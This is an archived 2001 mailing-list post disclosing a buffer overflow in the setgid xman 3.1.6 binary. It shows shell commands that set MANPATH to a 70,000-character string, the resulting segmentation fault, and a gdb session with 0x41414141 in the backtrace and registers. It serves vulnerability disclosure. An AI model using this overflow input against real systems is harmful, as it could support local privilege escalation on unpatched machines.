|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: KF (dotslash
snosoft.com)Date: Thu Jul 12 2001 - 20:35:13 CDT
I tried to send this to Bugtraq right about the same time I had
connection issues... not sure if it was denied so I figured I would try
to send it to
vuln-dev just incase.
-KF
-------- Original Message --------
Subject: suid xman 3.1.6 overflows
Date: Wed, 11 Jul 2001 23:32:49 -0400
From: KF <dotslashsnosoft.com>
To: bugtraqsecurityfocus.com, srtxgchanae.alphanet.ch
xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
overflow
srtxgchanae.alphanet.ch is noted as the packager of this RPM. I do not
know
the author.
[rootlinux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998
/usr/X11R6/bin/xman*
[rootlinux lib]# xman
[rootlinux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[rootlinux lib]# xman
Xman Error: Could not allocate memory for manual sections.
[rootlinux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[rootlinux lib]# xman
Segmentation fault
[rootlinux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66
-KF
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]